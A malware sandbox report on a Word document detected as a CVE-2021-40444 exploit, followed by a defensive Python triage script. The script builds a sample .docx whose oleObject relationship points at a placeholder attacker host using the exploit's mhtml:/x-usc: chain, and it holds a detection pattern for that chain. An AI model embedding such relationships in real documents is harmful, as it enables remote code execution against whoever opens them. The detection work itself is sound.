Summary | ZeroBOX

document.docx

Word 2007 file format (docx)
Category FILE
Machine s1_win7_x6401
Started Sept. 14, 2021, 5:23 p.m.
Completed Sept. 14, 2021, 5:26 p.m.
Size 12.8KB
Type Microsoft OOXML
MD5 3c64e8a4bfdce7c4f19a441d13413acb
SHA256 dd1f09bb538a31c2c0e4f3218aa4a989256691e73738c7bfb7a60e6db9b7b0cf
CRC32 655A664D
ssdeep 192:76O3KmBOJ2wc3rMKkViP/kcMD2h0v5MJnJv18H111M05AgPekpn/w:76O3fBIhV8/6hv5MJnJ2H111/eqn/w
Yara
  • docx - Word 2007 file format detection

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

file C:\Users\test22\AppData\Local\Temp\~$cument.docx

API: NtCreateFile
Arguments:
  create_disposition: 5 (FILE_OVERWRITE_IF)
  file_handle: 0x000003ec
  filepath: C:\Users\test22\AppData\Local\Temp\~$cument.docx
  desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
  file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
  filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$cument.docx
  create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
  status_info: 2 (FILE_CREATED)
  share_access: 0 ()
Status 1, Return 0, Repeated 0

Note: a hidden "~$" file next to the opened document is Word's own owner lock file, written whenever a document is opened for editing. Its creation confirms Word opened the sample; it is not a payload dropped by the document.
ClamAV Doc.Exploit.CVE_2021_40444-9891528-0
CAT-QuickHeal OLE.CVE-2021-40444.44117
McAfee Exploit-CVE2021-40444.a
Arcabit Exploit.CVE-2021-40444.Gen.1
ESET-NOD32 DOC/TrojanDownloader.Agent.DHY
Avast XML:CVE-2021-40444-A [Expl]
Kaspersky HEUR:Exploit.MSOffice.CVE-2021-40444.a
BitDefender Exploit.CVE-2021-40444.Gen.1
NANO-Antivirus Exploit.Xml.CVE-2017-0199.equmby
MicroWorld-eScan Exploit.CVE-2021-40444.Gen.1
Rising Exploit.CVE-2021-40444!1.D97D (CLASSIC)
Ad-Aware Exploit.CVE-2021-40444.Gen.1
Emsisoft Exploit.CVE-2021-40444.Gen.1 (B)
DrWeb Exploit.CVE-2021-40444.1
McAfee-GW-Edition Exploit-CVE2021-40444.a
FireEye Exploit.CVE-2021-40444.Gen.1
GData Script.Exploit.CVE-2021-40444.A
MAX malware (ai score=86)
Microsoft TrojanDownloader:O97M/Donoff.SA!Gen
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2021-40444.a
Fortinet MSOffice/Agent.DHY!tr
AVG XML:CVE-2021-40444-A [Expl]
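Nearly every engine above labels the sample as a CVE-2021-40444 lure, while the behavioural section records no network traffic, so the sandbox run alone does not show where the document points. The public CVE-2021-40444 delivery chain is an external oleObject relationship in the package whose target uses the mhtml: scheme (usually chained with !x-usc:), so a static pass over the OOXML relationship parts is the quickest confirmation. The script below is an added example, not part of the ZeroBOX report or the analysed sample: it builds a minimal .docx in memory with a constructed placeholder relationship (attacker.example is not an indicator from this file) and flags external oleObject relationships with a suspicious scheme while leaving ordinary external hyperlinks alone.

```python
"""Static triage of an OOXML package for CVE-2021-40444-style
external OLE relationships.

Added example; the sample .docx is constructed here for illustration
and its URLs are placeholders, not indicators from the analysed file.
"""
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
HYPERLINK_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/"
                      "2006/relationships/hyperlink")
# Schemes used by the CVE-2021-40444 chain: an mhtml: wrapper around an
# http(s) URL, often followed by an !x-usc: chained URL.
SUSPICIOUS_SCHEME = re.compile(r"^(mhtml|x-usc):", re.IGNORECASE)


def scan_relationships(docx_bytes):
    """Return (part, rel_id, type, target) for every External relationship
    found in any *.rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                # TargetMode defaults to Internal when absent.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                findings.append((name, rel.get("Id"), rel.get("Type"),
                                 rel.get("Target")))
    return findings


def is_cve_2021_40444_indicator(rel_type, target):
    """An external oleObject relationship whose target uses mhtml: or
    x-usc: is the hallmark of the CVE-2021-40444 delivery chain."""
    return rel_type == OLE_REL_TYPE and bool(SUSPICIOUS_SCHEME.match(target or ""))


def triage(docx_bytes):
    """Return only the external relationships matching the exploit pattern."""
    return [f for f in scan_relationships(docx_bytes)
            if is_cve_2021_40444_indicator(f[2], f[3])]


def build_sample():
    """Constructed minimal .docx: one benign external hyperlink and one
    external oleObject pointing at a placeholder mhtml: URL."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="%s" Target="mhtml:http://attacker.example/'
        'word.html!x-usc:http://attacker.example/word.html" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="%s" Target="https://www.example.com/" '
        'TargetMode="External"/>'
        '</Relationships>' % (REL_NS, OLE_REL_TYPE, HYPERLINK_REL_TYPE)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # not parsed here
        zf.writestr("word/document.xml", "<document/>")  # placeholder body
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rel_id, rel_type, target in triage(build_sample()):
        print("%s %s -> %s" % (part, rel_id, target))
```

Run it against a real sample by replacing build_sample() with the file's bytes; any hit names the relationship part and the remote URL the document would fetch on open, which is the indicator to block even when the sandbox saw no outbound connection.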